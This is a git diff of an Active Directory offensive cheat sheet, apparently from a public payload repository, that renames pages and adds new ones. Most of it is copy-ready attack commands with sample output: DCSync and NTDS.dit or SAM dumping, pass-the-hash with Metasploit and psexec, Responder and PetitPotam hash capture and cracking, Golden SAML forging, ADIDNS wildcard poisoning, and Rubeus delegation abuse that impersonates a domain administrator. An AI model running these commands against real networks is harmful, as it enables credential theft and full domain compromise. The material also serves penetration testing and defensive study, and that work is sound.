0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 - [*] des_cbc_md5 : BA297CFD07E62A5E - ``` - -6. Impersonate domain admin using our newly created machine account - - ```powershell - .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap - .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap - - [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' - [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) - [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan' - [*] Sending S4U2proxy request - [+] S4U2proxy success! - [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan': - - doIGXDCCBligAwIBBaEDAgEWooIFXDCCBVhhggVUMIIFUKADAgEFoQ0bC0ZBQ1RPUlkuTEFOoicwJaAD - AgECoR4wHBsEY2lmcxsUZGMwMS[...]PMIIFC6ADAgESoQMCAQOiggT9BIIE - LmZhY3RvcnkubGFu - - [*] Action: Import Ticket - [+] Ticket successfully imported! - ``` - ## Kerberos Service for User Extension * Service For User To Self which allows a service to obtain a TGS on behalf of another user @@ -1878,16 +1223,6 @@ PXE allows a workstation to boot from the network by retrieving an operating sys >>>> >>>> UserPassword = Somepass1 ``` -## DNS Reconnaissance - -Perform ADIDNS searches - -```powershell -StandIn.exe --dns --limit 20 -StandIn.exe --dns --filter SQL --limit 10 -StandIn.exe --dns --forest --domain redhook --user RFludd --pass Cl4vi$Alchemi4e -StandIn.exe --dns --legacy --domain redhook --user RFludd --pass Cl4vi$Alchemi4e -``` ## DSRM Credentials diff --git a/docs/active-directory/ad-certificate-services.md b/docs/active-directory/ad-adcs-certificate-services.md similarity index 99% rename from docs/active-directory/ad-certificate-services.md rename to docs/active-directory/ad-adcs-certificate-services.md index c919fd6..eb56b9d 100644 --- a/docs/active-directory/ad-certificate-services.md +++ b/docs/active-directory/ad-adcs-certificate-services.md @@ -1,4 +1,4 @@ -# Active Directory Certificate Services +# Active Directory - Certificate Services * Find ADCS Server * `crackmapexec ldap domain.lab -u username -p password -M adcs` diff --git a/docs/active-directory/ad-acl-ace.md b/docs/active-directory/ad-adds-acl-ace.md similarity index 99% rename from docs/active-directory/ad-acl-ace.md rename to docs/active-directory/ad-adds-acl-ace.md index faf4105..952a6d9 100644 --- a/docs/active-directory/ad-acl-ace.md +++ b/docs/active-directory/ad-adds-acl-ace.md @@ -1,4 +1,7 @@ -# Active Directory ACLs/ACEs +# Active Directory - Access Controls + +* ACL: Access Control Lists +* ACE: Access Control Entry Check ACL for an User with [ADACLScanner](https://github.com/canix1/ADACLScanner). diff --git a/docs/active-directory/ad-adds-dumping-ntds.md b/docs/active-directory/ad-adds-dumping-ntds.md new file mode 100644 index 0000000..b343cee --- /dev/null +++ b/docs/active-directory/ad-adds-dumping-ntds.md @@ -0,0 +1,125 @@ +# Active Directory - Dumping NTDS + +You will need the following files to extract the ntds : +- NTDS.dit file +- SYSTEM hive (`C:\Windows\System32\SYSTEM`) + +Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. +- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). +- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. + +However you can change the location to a custom one, you will need to query the registry to get the current location. + +```powershell +reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" +``` + +## DCSync Attack + +DCSync is a technique used by attackers to obtain sensitive information, including password hashes, from a domain controller in an Active Directory environment. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. + +* DCSync only one user + ```powershell + mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt + ``` +* DCSync all users of the domain + ```powershell + mimikatz# lsadump::dcsync /domain:htb.local /all /csv + + crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds + crackmapexec smb 10.10.10.10 -u 'username' -p 'password' --ntds drsuapi + ``` + +> :warning: OPSEC NOTE: Replication is always done between 2 Computers. Doing a DCSync from a user account can raise alerts. + + +## Volume Shadow Copy + +The VSS is a Windows service that allows users to create snapshots or backups of their data at a specific point in time. Attackers can abuse this service to access and copy sensitive data, even if it is currently being used or locked by another process. + +* [windows-commands/vssadmin](https://learn.microsoft.com/fr-fr/windows-server/administration/windows-commands/vssadmin) + ```powershell + vssadmin create shadow /for=C: + copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy + copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy + ``` +* [windows-commands/ntdsutil](https://learn.microsoft.com/fr-fr/troubleshoot/windows-server/identity/use-ntdsutil-manage-ad-files) + ```powershell + ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q + ``` +* [CrackMapExec VSS module](https://wiki.porchetta.industries/smb-protocol/obtaining-credentials/dump-ntds.dit) + ```powershell + cme smb 10.10.0.202 -u username -p password --ntds vss + ``` + + +## Extract hashes from ntds.dit + +then you need to use [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) to extract the hashes, use the `LOCAL` options to use it on a retrieved ntds.dit + +```java +secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL +``` + +[secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) also works remotely + +```java +./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss -pwd-last-set -user-status +./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1 +``` + +* `-pwd-last-set`: Shows pwdLastSet attribute for each NTDS.DIT account. +* `-user-status`: Display whether or not the user is disabled. + + +## Using Mimikatz sekurlsa + +Dumps credential data in an Active Directory domain when run on a Domain Controller. +:warning: Requires administrator access with debug or Local SYSTEM rights + +```powershell +sekurlsa::krbtgt +lsadump::lsa /inject /name:krbtgt +``` + +## Crack NTLM hashes with hashcat + +Useful when you want to have the clear text password or when you need to make stats about weak passwords. + +Recommended wordlists: +- [Rockyou.txt](https://weakpass.com/wordlist/90) +- [Have I Been Pwned founds](https://hashmob.net/hashlists/info/4169-Have%20I%20been%20Pwned%20V8%20(NTLM)) +- [Weakpass.com](https://weakpass.com/) +- Read More at [Methodology and Resources/Hash Cracking.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md) + +```powershell +# Basic wordlist +# (-O) will Optimize for 32 characters or less passwords +# (-w 4) will set the workload to "Insane" +$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r myrules.rule --opencl-device-types 1,2 + +# Generate a custom mask based on a wordlist +$ git clone https://github.com/iphelix/pack/blob/master/README +$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask +$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask +``` + +:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : +- [hashmob.net](https://hashmob.net) +- [crackstation.net](https://crackstation.net) +- [hashes.com](https://hashes.com/en/decrypt/hash) + + +## NTDS Reversible Encryption + +`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form. + +The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin. +This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”. + +* List users with "Store passwords using reversible encryption" enabled + ```powershell + Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl + ``` + +The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. diff --git a/docs/active-directory/ad-enumerate.md b/docs/active-directory/ad-adds-enumerate.md similarity index 100% rename from docs/active-directory/ad-enumerate.md rename to docs/active-directory/ad-adds-enumerate.md diff --git a/docs/active-directory/ad-group-policy-objects.md b/docs/active-directory/ad-adds-group-policy-objects.md similarity index 100% rename from docs/active-directory/ad-group-policy-objects.md rename to docs/active-directory/ad-adds-group-policy-objects.md diff --git a/docs/active-directory/ad-groups.md b/docs/active-directory/ad-adds-groups.md similarity index 100% rename from docs/active-directory/ad-groups.md rename to docs/active-directory/ad-adds-groups.md diff --git a/docs/active-directory/ad-linux.md b/docs/active-directory/ad-adds-linux.md similarity index 100% rename from docs/active-directory/ad-linux.md rename to docs/active-directory/ad-adds-linux.md diff --git a/docs/active-directory/ad-rodc.md b/docs/active-directory/ad-adds-rodc.md similarity index 100% rename from docs/active-directory/ad-rodc.md rename to docs/active-directory/ad-adds-rodc.md diff --git a/docs/active-directory/ad-adfs-federation-services.md b/docs/active-directory/ad-adfs-federation-services.md new file mode 100644 index 0000000..6937006 --- /dev/null +++ b/docs/active-directory/ad-adfs-federation-services.md @@ -0,0 +1,42 @@ +# Active Directory Federation Services + +## ADFS - Golden SAML + +**Requirements**: + +* ADFS service account +* The private key (PFX with the decryption password) + +**Exploitation**: + +* Run [mandiant/ADFSDump](https://github.com/mandiant/ADFSDump) on AD FS server as the AD FS service account. It will query the Windows Internal Database (WID): `\\.\pipe\MICROSOFT##WID\tsql\query` +* Convert PFX and Private Key to binary format + ```ps1 + # For the pfx + echo AAAAAQAAAAAEE[...]Qla6 | base64 -d > EncryptedPfx.bin + # For the private key + echo f7404c7f[...]aabd8b | xxd -r -p > dkmKey.bin + ``` +* Create the Golden SAML using [mandiant/ADFSpoof](https://github.com/mandiant/ADFSpoof), you might need to update the [dependencies](https://github.com/szymex73/ADFSpoof). + ```ps1 + mkdir ADFSpoofTools + cd $_ + git clone https://github.com/dmb2168/cryptography.git + git clone https://github.com/mandiant/ADFSpoof.git + virtualenv3 venvADFSSpoof + source venvADFSSpoof/bin/activate + pip install lxml + pip install signxml + pip uninstall -y cryptography + cd cryptography + pip install -e . + cd ../ADFSpoof + pip install -r requirements.txt + python ADFSpoof.py -b EncryptedPfx.bin DkmKey.bin -s adfs.pentest.lab saml2 --endpoint https://www.contoso.com/adfs/ls + /SamlResponseServlet --nameidformat urn:oasis:names:tc:SAML:2.0:nameid-format:transient --nameid 'PENTEST\administrator' --rpidentifier Supervision --assertions 'PENTEST\administrator' + ``` + +Other interesting tools to exploit AD FS: + +* [WhiskeySAML](https://github.com/secureworks/whiskeysamlandfriends/tree/main/whiskeysaml) + diff --git a/docs/active-directory/ad-integrated-dns.md b/docs/active-directory/ad-integrated-dns.md new file mode 100644 index 0000000..6490c0b --- /dev/null +++ b/docs/active-directory/ad-integrated-dns.md @@ -0,0 +1,34 @@ +# Active Directory Integrated DNS + +ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic. Active Directory will need some time (~180 seconds) to sync LDAP changes via its DNS dynamic updates protocol. + +* Enumerate all records using [dirkjanm/adidnsdump](https://github.com/dirkjanm/adidnsdump) + ```ps1 + adidnsdump -u DOMAIN\\user --print-zones dc.domain.corp (--dns-tcp) + ``` +* Query a node using [dirkjanm/krbrelayx](https://github.com/dirkjanm/krbrelayx) + ```ps1 + dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action query $DomainController (--legacy) + ``` +* Add a node and attach a record + ```ps1 + dnstool.py -u 'DOMAIN\user' -p 'password' --record '*' --action add --data $AttackerIP $DomainController + ``` + +The common way to abuse ADIDNS is to set a wildcard record and then passively listen to the network. + +```ps1 +Invoke-Inveigh -ConsoleOutput Y -ADIDNS combo,ns,wildcard -ADIDNSThreshold 3 -LLMNR Y -NBNS Y -mDNS Y -Challenge 1122334455667788 -MachineAccounts Y +``` + + +## DNS Reconnaissance + +Perform **ADIDNS** searches + +```powershell +StandIn.exe --dns --limit 20 +StandIn.exe --dns --filter SQL --limit 10 +StandIn.exe --dns --forest --domain --user --pass +StandIn.exe --dns --legacy --domain --user --pass +``` \ No newline at end of file diff --git a/docs/active-directory/hash-capture.md b/docs/active-directory/hash-capture.md new file mode 100644 index 0000000..e845803 --- /dev/null +++ b/docs/active-directory/hash-capture.md @@ -0,0 +1,91 @@ +# Hash - Capture and Cracking + +## Capturing and cracking Net-NTLMv1/NTLMv1 hashes/tokens + +> Net-NTLMv1 (NTLMv1) authentication tokens are used for network authentication (they are derived from a challenge/response DES-based algorithm with the user's NT-hash as symetric keys. + +:information_source: : Coerce a callback using PetitPotam or SpoolSample on an affected machine and downgrade the authentication to **NetNTLMv1 Challenge/Response authentication**. This uses the outdated encryption method DES to protect the NT/LM Hashes. + +**Requirements**: +* LmCompatibilityLevel = 0x1: Send LM & NTLM (`reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v lmcompatibilitylevel`) + +**Exploitation**: +* Capturing using Responder: Edit the `/etc/responder/Responder.conf` file to include the magical **1122334455667788** challenge + ```ps1 + HTTPS = On + DNS = On + LDAP = On + ... + ; Custom challenge. + ; Use "Random" for generating a random challenge for each requests (Default) + Challenge = 1122334455667788 + ``` +* Fire Responder: `responder -I eth0 --lm`, if `--disable-ess` is set, extended session security will be disabled for NTLMv1 authentication +* Force a callback: + ```ps1 + PetitPotam.exe Responder-IP DC-IP # Patched around August 2021 + PetitPotam.py -u Username -p Password -d Domain -dc-ip DC-IP Responder-IP DC-IP # Not patched for authenticated users + ``` +* If you got some `NetNTLMv1 tokens`, you can try to **shuck** them online via [Shuck.Sh](https://shuck.sh/) or locally/on-premise via [ShuckNT](https://github.com/yanncam/ShuckNT/) to get NT-hashes corresponding from [HIBP database](https://haveibeenpwned.com/Passwords). If the NT-hash has previously leaked, the NetNTLMv1 is converted to NT-hash ([pass-the-hash](#pass-the-hash) ready) instantly. The [shucking process](https://www.youtube.com/watch?v=OQD3qDYMyYQ&ab_channel=PasswordVillage) works for any NetNTLMv1 with or without ESS/SSP (challenge != `1122334455667788`) but mainly for user account (plaintext previsouly leaked). + ```ps1 + # Submit NetNTLMv1 online to https://shuck.sh/get-shucking.php + # Or shuck them on-premise via ShuckNT script: + $ php shucknt.php -f tokens-samples.txt -w pwned-passwords-ntlm-reversed-ordered-by-hash-v8.bin + [...] + 10 hashes-challenges analyzed in 3 seconds, with 8 NT-Hash instantly broken for pass-the-hash and 1 that can be broken via crack.sh for free. + [INPUT] ycam::ad:DEADC0DEDEADC0DE00000000000000000000000000000000:70C249F75FB6D2C0AC2C2D3808386CCAB1514A2095C582ED:1122334455667788 + [NTHASH-SHUCKED] 93B3C62269D55DB9CA660BBB91E2BD0B + ``` +* If you got some `NetNTLMv1 tokens`, you can also try to crack them via [Crack.Sh](https://crack.sh/) (cloud service when available, more time and potentially chargeable). For this you need to format them to submit them on [Crack.Sh](https://crack.sh/netntlm/). The Converter of [Shuck.Sh](https://shuck.sh/) can be used to convert format easily. + ```ps1 + # When there is no-ESS/SSP and the challenge is set to 1122334455667788, it's free (0$): + username::hostname:response:response:challenge -> NTHASH:response + NTHASH:F35A3FE17DCB31F9BE8A8004B3F310C150AFA36195554972 + + # When there is ESS/SSP or challenge != 1122334455667788, it's chargeable from $20-$200: + username::hostname:lmresponse+0padding:ntresponse:challenge -> $NETNTLM$challenge$ntresponse + $NETNTLM$DEADC0DEDEADC0DE$507E2A2131F4AF4A299D8845DE296F122CA076D49A80476E + ``` +* Finaly, if no [Shuck.Sh](https://shuck.sh/) nor [Crack.Sh](https://crack.sh/) can be used, you can try to break NetNTLMv1 with Hashcat / John The Ripper + ```ps1 + john --format=netntlm hash.txt + hashcat -m 5500 -a 3 hash.txt # for NetNTLMv1(-ESS/SSP) to plaintext (for user account) + hashcat -m 27000 -a 0 hash.txt nthash-wordlist.txt # for NetNTLMv1(-ESS/SSP) to NT-hash (for user and computer account, depending on nthash-wordlist quality) + hashcat -m 14000 -a 3 inputs.txt --hex-charset -1 /usr/share/hashcat/charsets/DES_full.hcchr ?1?1?1?1?1?1?1?1 # for NetNTLMv1(-ESS/SSP) to DES-keys (KPA-attack) of user/computer account with 100% success rate, then regenerate NT-hash with these DES-keys on https://shuck.sh/converter.php. + ``` +* Now you can DCSync using the Pass-The-Hash with the DC machine account + +:warning: NetNTLMv1 with ESS / SSP (Extended Session Security / Security Support Provider) changes the final challenge by adding a new alea (!= `1122334455667788`, so chargeable on [Crack.Sh](https://crack.sh/)). + +:warning: NetNTLMv1 format is `login::domain:lmresp:ntresp:clientChall`. If the `lmresp` contains a **0's-padding** this means that the token is protected by **ESS/SSP**. + +:warning: NetNTLMv1 final challenge is the Responder's challenge itself (`1122334455667788`) when there is no ESS/SSP. If ESS/SSP is enabled, the final challenge is the first 8 bytes of the MD5 hash from the concatenation of the client challenge and server challenge. The details of the algorithmic generation of a NetNTLMv1 are illustrated on the [Shuck.Sh Generator](https://shuck.sh/generator.php) and detailed in [MISCMag#128](https://connect.ed-diamond.com/misc/misc-128/shuck-hash-before-trying-to-crack-it). + +:warning: If you get some tokens from other tools ([hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) or [chapcrack](https://github.com/moxie0/chapcrack)) in other formats, like tokens starting with the prefix `$MSCHAPv2$`, `$NETNTLM$` or `$99$`, they correspond to a classic NetNTLMv1 and can be converted from one format to another [here](https://shuck.sh/converter.php). + + +**Mitigations**: + +* Set the Lan Manager authentication level to `Send NTLMv2 responses only. Refuse LM & NTLM` + +## Capturing and cracking Net-NTLMv2/NTLMv2 hashes + +If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network. + +```powershell +# https://github.com/lgandx/Responder +$ sudo ./Responder.py -I eth0 -wfrd -P -v + +# https://github.com/Kevin-Robertson/InveighZero +PS > .\inveighzero.exe -FileOutput Y -NBNS Y -mDNS Y -Proxy Y -MachineAccounts Y -DHCPv6 Y -LLMNRv6 Y [-Elevated N] + +# https://github.com/EmpireProject/Empire/blob/master/data/module_source/collection/Invoke-Inveigh.ps1 +PS > Invoke-Inveigh [-IP '10.10.10.10'] -ConsoleOutput Y -FileOutput Y -NBNS Y –mDNS Y –Proxy Y -MachineAccounts Y +``` + +Crack the hashes with Hashcat / John The Ripper + +```ps1 +john --format=netntlmv2 hash.txt +hashcat -m 5600 -a 3 hash.txt +``` diff --git a/docs/active-directory/hash-over-pass-the-hash.md b/docs/active-directory/hash-over-pass-the-hash.md new file mode 100644 index 0000000..825d989 --- /dev/null +++ b/docs/active-directory/hash-over-pass-the-hash.md @@ -0,0 +1,32 @@ +## Hash - OverPass-the-Hash + +In this technique, instead of passing the hash directly, we use the NT hash of an account to request a valid Kerberost ticket (TGT). + +### Using impacket + +```bash +root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com +root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache" +root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass + +# also with the AES Key if you have it +root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com + +root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5 +root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM +root@kali:~$ klist +``` + +### Using Rubeus + +```powershell +# Request a TGT as the target user and pass it into the current session +# NOTE: Make sure to clear tickets in the current session (with 'klist purge') to ensure you don't have multiple active TGTs +.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /ptt + +# More stealthy variant, but requires the AES256 hash +.\Rubeus.exe asktgt /user:Administrator /aes256:[AES256HASH] /opsec /ptt + +# Pass the ticket to a sacrificial hidden process, allowing you to e.g. steal the token from this process (requires elevation) +.\Rubeus.exe asktgt /user:Administrator /rc4:[NTLMHASH] /createnetonly:C:\Windows\System32\cmd.exe +``` \ No newline at end of file diff --git a/docs/active-directory/hash-pass-the-hash.md b/docs/active-directory/hash-pass-the-hash.md new file mode 100644 index 0000000..c0df982 --- /dev/null +++ b/docs/active-directory/hash-pass-the-hash.md @@ -0,0 +1,38 @@ +# Hash - Pass-the-Hash + +The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes. Since Windows Vista, attackers have been unable to pass-the-hash to local admin accounts that weren’t the built-in RID 500. + +* Metasploit + ```powershell + use exploit/windows/smb/psexec + set RHOST 10.2.0.3 + set SMBUser jarrieta + set SMBPass nastyCutt3r + # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack. + # NOTE2: Require the full NT hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee) + set PAYLOAD windows/meterpreter/bind_tcp + run + shell + ``` +* CrackMapExec + ```powershell + cme smb 10.2.0.2/24 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami" + ``` +* Impacket suite + ```powershell + proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d + ``` +* Windows RDP and mimikatz + ```powershell + sekurlsa::pth /user:Administrator /domain:contoso.local /ntlm:b73fdfe10e87b4ca5c0d957f81de6863 + sekurlsa::pth /user: /domain: /ntlm: /run:"mstsc.exe /restrictedadmin" + ``` + +You can extract the local **SAM database** to find the local administrator hash : + +```powershell +C:\> reg.exe save hklm\sam c:\temp\sam.save +C:\> reg.exe save hklm\security c:\temp\security.save +C:\> reg.exe save hklm\system c:\temp\system.save +$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL +``` \ No newline at end of file diff --git a/docs/active-directory/ad-shares.md b/docs/active-directory/internal-shares.md similarity index 100% rename from docs/active-directory/ad-shares.md rename to docs/active-directory/internal-shares.md diff --git a/docs/active-directory/kerberos-delegation-constrained.md b/docs/active-directory/kerberos-delegation-constrained.md new file mode 100644 index 0000000..6e5b0d5 --- /dev/null +++ b/docs/active-directory/kerberos-delegation-constrained.md @@ -0,0 +1,68 @@ +# Kerberos Delegation - Constrained Delegation + +> Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service. + + +## Identify a Constrained Delegation + +* BloodHound: `MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p` +* PowerView: `Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft` +* Native + ```powershell + Get-DomainComputer -TrustedToAuth | select -exp dnshostname + Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo + ``` + +## Exploit the Constrained Delegation + +* Impacket + ```ps1 + getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10 + ``` + +* Rubeus: S4U2 attack (S4U2self + S4U2proxy) + ```ps1 + # with a password + Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password" + + # with a NT hash + Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt + Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt + dir \\dc.domain.com\c$ + ``` + +* Rubeus: use an existing ticket to perform a S4U2 attack to impersonate the "Administrator" + ```ps1 + # Dump ticket + Rubeus.exe tgtdeleg /nowrap + Rubeus.exe triage + Rubeus.exe dump /luid:0x12d1f7 + + # Create a ticket + Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /ticket:doIFRjCCBUKgAwIBB...BTA== /ptt + ``` + +* Rubeus : using aes256 keys + ```ps1 + # Get aes256 keys of the machine account + privilege::debug + token::elevate + sekurlsa::ekeys + + # Create a ticket + Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/srv.domain.local /user:win10x64$ /aes256:4b55f...fd82 /ptt + ``` + + +## Impersonate a domain user on a resource + +Require: +* SYSTEM level privileges on a machine configured with constrained delegation + +```ps1 +PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null +PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator') +PS> $idToImpersonate.Impersonate() +PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name +PS> ls \\dc01.offense.local\c$ +``` \ No newline at end of file diff --git a/docs/active-directory/kerberos-delegation-rbcd.md b/docs/active-directory/kerberos-delegation-rbcd.md new file mode 100644 index 0000000..6bb4ae1 --- /dev/null +++ b/docs/active-directory/kerberos-delegation-rbcd.md @@ -0,0 +1,85 @@ +# Kerberos Delegation - Resource Based Constrained Delegation + +Resource-based Constrained Delegation was introduced in Windows Server 2012. + +> The user sends a Service Ticket (ST) to access the service ("Service A"), and if the service is allowed to delegate to another pre-defined service ("Service B"), then Service A can present to the authentication service the TGS that the user provided and obtain a ST for the user to Service B. https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html + +1. Import **Powermad** and **Powerview** + + ```powershell + PowerShell.exe -ExecutionPolicy Bypass + Import-Module .\powermad.ps1 + Import-Module .\powerview.ps1 + ``` + +2. Get user SID + + ```powershell + $AttackerSID = Get-DomainUser SvcJoinComputerToDom -Properties objectsid | Select -Expand objectsid + $ACE = Get-DomainObjectACL dc01-ww2.factory.lan | ?{$_.SecurityIdentifier -match $AttackerSID} + $ACE + ConvertFrom-SID $ACE.SecurityIdentifier + ``` + +3. Abuse **MachineAccountQuota** to create a computer account and set an SPN for it + + ```powershell + New-MachineAccount -MachineAccount swktest -Password $(ConvertTo-SecureString 'Weakest123*' -AsPlainText -Force) + ``` + +4. Rewrite DC's **AllowedToActOnBehalfOfOtherIdentity** properties + + ```powershell + $ComputerSid = Get-DomainComputer swktest -Properties objectsid | Select -Expand objectsid + $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))" + $SDBytes = New-Object byte[] ($SD.BinaryLength) + $SD.GetBinaryForm($SDBytes, 0) + Get-DomainComputer dc01-ww2.factory.lan | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} + $RawBytes = Get-DomainComputer dc01-ww2.factory.lan -Properties 'msds-allowedtoactonbehalfofotheridentity' | select -expand msds-allowedtoactonbehalfofotheridentity + $Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0 + $Descriptor.DiscretionaryAcl + ``` + + ```ps1 + # alternative + $SID_FROM_PREVIOUS_COMMAND = Get-DomainComputer MACHINE_ACCOUNT_NAME -Properties objectsid | Select -Expand objectsid + $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$SID_FROM_PREVIOUS_COMMAND)"; $SDBytes = New-Object byte[] ($SD.BinaryLength); $SD.GetBinaryForm($SDBytes, 0); Get-DomainComputer DC01 | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} + + # alternative + StandIn_Net35.exe --computer dc01 --sid SID_FROM_PREVIOUS_COMMAND + ``` + +5. Use Rubeus to get hash from password + + ```powershell + Rubeus.exe hash /password:'Weakest123*' /user:swktest$ /domain:factory.lan + [*] Input password : Weakest123* + [*] Input username : swktest$ + [*] Input domain : factory.lan + [*] Salt : FACTORY.LANswktest + [*] rc4_hmac : F8E064CA98539B735600714A1F1907DD + [*] aes128_cts_hmac_sha1 : D45DEADECB703CFE3774F2AA20DB9498 + [*] aes256_cts_hmac_sha1 : 0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 + [*] des_cbc_md5 : BA297CFD07E62A5E + ``` + +6. Impersonate domain admin using our newly created machine account + + ```powershell + .\Rubeus.exe s4u /user:swktest$ /rc4:F8E064CA98539B735600714A1F1907DD /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap + .\Rubeus.exe s4u /user:swktest$ /aes256:0129D24B2793DD66BAF3E979500D8B313444B4D3004DE676FA6AFEAC1AC5C347 /impersonateuser:Administrator /msdsspn:cifs/dc01-ww2.factory.lan /ptt /altservice:cifs,http,host,rpcss,wsman,ldap + + [*] Impersonating user 'Administrator' to target SPN 'cifs/dc01-ww2.factory.lan' + [*] Using domain controller: DC01-WW2.factory.lan (172.16.42.5) + [*] Building S4U2proxy request for service: 'cifs/dc01-ww2.factory.lan' + [*] Sending S4U2proxy request + [+] S4U2proxy success! + [*] base64(ticket.kirbi) for SPN 'cifs/dc01-ww2.factory.lan': + + 